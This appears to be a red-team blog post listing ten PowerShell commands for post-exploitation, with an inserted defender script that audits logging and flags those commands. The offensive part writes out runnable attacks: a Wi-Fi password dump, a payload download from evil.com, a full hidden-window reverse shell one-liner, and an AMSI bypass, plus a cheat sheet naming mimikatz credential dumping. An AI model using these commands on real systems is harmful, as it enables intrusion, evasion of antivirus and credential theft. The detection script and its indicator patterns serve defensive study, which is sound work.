⚔️ Top 10 PowerShell Commands Every Red Teamer Should Know (2025 Edition)
“Attackers don’t bring malware; they bring PowerShell.” – Every SOC Analyst Ever
PowerShell has become a critical weapon in a red teamer's arsenal. Native to Windows, stealthy, and powerful, it’s the perfect post-exploitation and recon tool. In this blog, we’ll cover 10 practical PowerShell commands, what they do, and when/how to use them effectively in red team operations or adversary emulation.
1. System Info Discovery
Get-ComputerInfo | Select-Object CsName, WindowsVersion, OsName, OsArchitecture
This command fetches essential target system info – great for situational awareness once you have code execution.
2. Network Recon
Get-NetTCPConnection | Group-Object State
Shows all active TCP connections and their states. Helps identify open ports, listeners, or suspicious persistence.
3. Enumerate Domain Users
Get-ADUser -Filter * | Select-Object Name,SamAccountName,Enabled
Pulls all domain users from AD (requires the ActiveDirectory module from RSAT or the Active Directory PowerShell shell). Helps find high-value targets.
Tip: Use this after pivoting into a domain-joined machine.
4. Extract Saved Wi-Fi Passwords
(netsh wlan show profiles) |
Select-String 'All User Profile' |
ForEach-Object {
$name = ($_.Line -split ':')[1].Trim()
netsh wlan show profile $name key=clear
}
Grabs saved wireless network passwords—useful for lateral movement in hybrid environments.
5. Invoke-WebRequest for Payload Delivery
Invoke-WebRequest -Uri http://evil.com/payload.exe -OutFile payload.exe
Downloads files from remote servers. Useful in post-exploitation to pull second-stage malware or tools.
6. Reverse Shell One-Liner
powershell -nop -w hidden -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.10',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}"
This is a weaponized reverse shell payload in one line. Use wisely in labs or approved test environments.
7. Bypass AMSI (Antimalware Scan Interface)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Bypasses Windows Defender AMSI, allowing potentially malicious scripts to run undetected (until caught).
⚠️ Ethical use only – don’t misuse this.
8. Enumerate All Running Processes
Get-Process | Sort-Object CPU -Descending | Select-Object -First 10
Useful to identify high CPU processes (possibly AV or forensic tools) or background services of interest.
9. List All Services (Check for Misconfig)
Get-Service | Where-Object {$_.Status -eq "Running"} | Select-Object Name, DisplayName, Status
Look for misconfigured or vulnerable services (like weak ACLs) for potential service hijacking.
10. ScriptBlock Logging & Security Checks
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational"
Use this to check whether your commands are being logged. Defensive testing is just as important as offense.
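The following is an added defender-side example; it is not code from the original post. It shows the other half of item 10 and of the "until caught" remark in item 7: first it audits (and can enable) the policy-controlled PowerShell logging features, then it scans script block text of the kind that event ID 4104 records for the command patterns shown in items 4 through 7. The registry paths are the documented Group Policy keys; the indicator names, the sample events and the user names in them are constructed for the dry run, and the Properties[2] index used in the commented Get-WinEvent line is assumed to be the ScriptBlockText field, so verify it on your build.

```powershell
# Added example (not from the original post): a defender-side triage helper.
# Part 1 audits the logging policy keys that item 10 relies on; Part 2 scans
# script block text (event ID 4104) for the command patterns in items 4-7.

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Get-PowerShellLoggingPolicy {
    # Reports which of the three policy-controlled logging features are on.
    # Returns $null when there is no HKLM: drive (e.g. pwsh on Linux).
    if (-not (Get-PSDrive -Name HKLM -ErrorAction SilentlyContinue)) { return $null }
    $check = @{
        ScriptBlockLogging = 'EnableScriptBlockLogging'
        ModuleLogging      = 'EnableModuleLogging'
        Transcription      = 'EnableTranscripting'
    }
    $result = [ordered]@{}
    foreach ($feature in $check.Keys) {
        $key   = Join-Path $PolicyRoot $feature
        $value = (Get-ItemProperty -Path $key -Name $check[$feature] -ErrorAction SilentlyContinue).($check[$feature])
        $result[$feature] = ($value -eq 1)
    }
    [pscustomobject]$result
}

function Enable-ScriptBlockLogging {
    # Turns on script block logging (event ID 4104) via the same policy key
    # that Group Policy writes. Needs an elevated prompt.
    $key = Join-Path $PolicyRoot 'ScriptBlockLogging'
    New-Item -Path $key -Force | Out-Null
    Set-ItemProperty -Path $key -Name 'EnableScriptBlockLogging' -Value 1 -Type DWord
}

# Indicator regexes derived from the commands shown in items 4-7 of this post.
$Indicators = @(
    @{ Name = 'WiFi profile key export';  Pattern = 'wlan\s+show\s+profile.*key=clear' }
    @{ Name = 'Download to disk';         Pattern = '(Invoke-WebRequest|\biwr\b).*-OutFile' }
    @{ Name = 'Raw TCP client + iex';     Pattern = 'Net\.Sockets\.TCPClient.*\b(iex|Invoke-Expression)\b' }
    @{ Name = 'AMSI amsiInitFailed tamper'; Pattern = 'AmsiUtils|amsiInitFailed' }
)

function Test-SuspiciousScriptBlock {
    param([Parameter(Mandatory)][string]$ScriptBlockText)
    # Returns the names of every indicator the text matches (empty array if none).
    # (?s) lets .* span the line breaks that multi-line script blocks contain.
    $hits = @(foreach ($ind in $Indicators) {
        if ($ScriptBlockText -match "(?s)$($ind.Pattern)") { $ind.Name }
    })
    return ,$hits
}

# Constructed sample script block texts (not real telemetry) for an offline dry run.
$SampleEvents = @(
    @{ Time = '2025-01-10T09:01:00Z'; User = 'CORP\jdoe';  Text = 'Get-Process | Sort-Object CPU -Descending | Select-Object -First 10' }
    @{ Time = '2025-01-10T09:02:30Z'; User = 'CORP\jdoe';  Text = "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')" }
    @{ Time = '2025-01-10T09:03:10Z'; User = 'CORP\svc01'; Text = 'netsh wlan show profile CorpWiFi key=clear' }
)

"Logging policy: $(Get-PowerShellLoggingPolicy | Out-String)"
foreach ($ev in $SampleEvents) {
    $hits = Test-SuspiciousScriptBlock -ScriptBlockText $ev.Text
    if ($hits.Count -gt 0) {
        "{0}  {1,-12}  {2}" -f $ev.Time, $ev.User, ($hits -join '; ')
    }
}

# On a Windows host with script block logging enabled, feed real 4104 events instead
# (Properties[2] is assumed to be the ScriptBlockText field; verify on your build):
# Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} |
#     ForEach-Object {
#         $t = $_.Properties[2].Value
#         $h = Test-SuspiciousScriptBlock -ScriptBlockText $t
#         if ($h) { [pscustomobject]@{ Time = $_.TimeCreated; Hits = ($h -join '; '); Text = $t } }
#     }
```

In the dry run the second and third sample events are flagged and the first is not. Because script block logging records the block after PowerShell has parsed it, these patterns also fire on commands that were obfuscated or encoded on the command line, which is why the bypass in item 7 is a common first hit in the 4104 log. Since item 10 shows that an operator will read that same log on the host, forward the Microsoft-Windows-PowerShell/Operational channel off-box rather than relying on a local query.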
Final Thoughts
PowerShell is native, powerful, and deadly in the wrong hands. Understanding its full capabilities lets you better emulate advanced adversaries—and also defend against them.
✅ Learn. Practice. Simulate.
Train in safe environments like:
Bonus: PowerShell Red Team Cheat Sheet
| Category | Command Example |
|---|---|
| Recon | systeminfo, ipconfig /all |
| User enum | net user, Get-LocalUser |
| Credential dump | mimikatz, Get-ADReplAccount |
| File transfer | Invoke-WebRequest, CertUtil |
| Shells | powershell reverse shell, nishang |
| AV Evasion | AMSI bypass, obfuscation |